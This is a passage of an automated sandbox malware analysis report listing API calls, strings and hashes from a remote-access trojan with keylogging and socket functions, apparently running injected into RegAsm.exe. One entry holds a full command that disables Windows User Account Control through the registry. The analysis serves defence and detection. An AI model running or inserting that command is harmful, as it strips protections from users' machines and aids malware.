                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                  • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                  • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                  • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                  APIs
                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                  • wsprintfW.USER32 ref: 0040B1F3
                                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EventLocalTimewsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 1497725170-248792730
                                  • Opcode ID: 0f663085bafeb43ea2fdef4183722c81361412db775a5db6f123464752fed336
                                  • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                  • Opcode Fuzzy Hash: 0f663085bafeb43ea2fdef4183722c81361412db775a5db6f123464752fed336
                                  • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSizeSleep
                                  • String ID: XQG
                                  • API String ID: 1958988193-3606453820
                                  • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                  • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                  • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                  • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • GetLastError.KERNEL32 ref: 0041D580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                  • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                  • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                  • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                  • CloseHandle.KERNEL32(?), ref: 004077AA
                                  • CloseHandle.KERNEL32(?), ref: 004077AF
                                  Strings
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                  • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                  • API String ID: 2922976086-4183131282
                                  • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                  • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                  • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                  • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                  Strings
                                  • SG, xrefs: 004076DA
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 0-643455097
                                  • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                  • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                  • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                  • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                  • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                  • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                  • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                  • String ID: KeepAlive | Disabled
                                  • API String ID: 2993684571-305739064
                                  • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                  • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                  • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                  • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                  APIs
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                  • Sleep.KERNEL32(00002710), ref: 0041AE07
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                  • String ID: Alarm triggered
                                  • API String ID: 614609389-2816303416
                                  • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                  • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                  • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                  • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                  Strings
                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                  • API String ID: 3024135584-2418719853
                                  • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                  • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                  • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                  • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                  • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                  • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                  • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                  APIs
                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  • _free.LIBCMT ref: 00444E06
                                  • _free.LIBCMT ref: 00444E1D
                                  • _free.LIBCMT ref: 00444E3C
                                  • _free.LIBCMT ref: 00444E57
                                  • _free.LIBCMT ref: 00444E6E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                  • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                  • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                  • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                  APIs
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                  • _free.LIBCMT ref: 004493BD
                                    • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                  • _free.LIBCMT ref: 00449589
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                  • String ID:
                                  • API String ID: 1286116820-0
                                  • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                  • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                  • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                  • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                  APIs
                                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                    • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 4269425633-0
                                  • Opcode ID: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                  • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                  • Opcode Fuzzy Hash: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                  • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                  • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                  • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                  • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                  • __alloca_probe_16.LIBCMT ref: 004511B1
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                  • __freea.LIBCMT ref: 0045121D
                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                  • String ID:
                                  • API String ID: 313313983-0
                                  • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                  • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                  • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                  • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                  • _free.LIBCMT ref: 0044F3BF
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                  • String ID:
                                  • API String ID: 336800556-0
                                  • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                  • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                  • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                  • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                  APIs
                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                  • _free.LIBCMT ref: 004482D3
                                  • _free.LIBCMT ref: 004482FA
                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                  • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                  • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                  • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                  APIs
                                  • _free.LIBCMT ref: 004509D4
                                    • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                  • _free.LIBCMT ref: 004509E6
                                  • _free.LIBCMT ref: 004509F8
                                  • _free.LIBCMT ref: 00450A0A
                                  • _free.LIBCMT ref: 00450A1C
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                  • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                  • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                  APIs
                                  • _free.LIBCMT ref: 00444066
                                    • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                  • _free.LIBCMT ref: 00444078
                                  • _free.LIBCMT ref: 0044408B
                                  • _free.LIBCMT ref: 0044409C
                                  • _free.LIBCMT ref: 004440AD
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                  • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                  • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                  APIs
                                  • _strpbrk.LIBCMT ref: 0044E738
                                  • _free.LIBCMT ref: 0044E855
                                    • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                    • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                    • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                  • String ID: *?$.
                                  • API String ID: 2812119850-3972193922
                                  • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                  • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                  • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                  • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                    • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
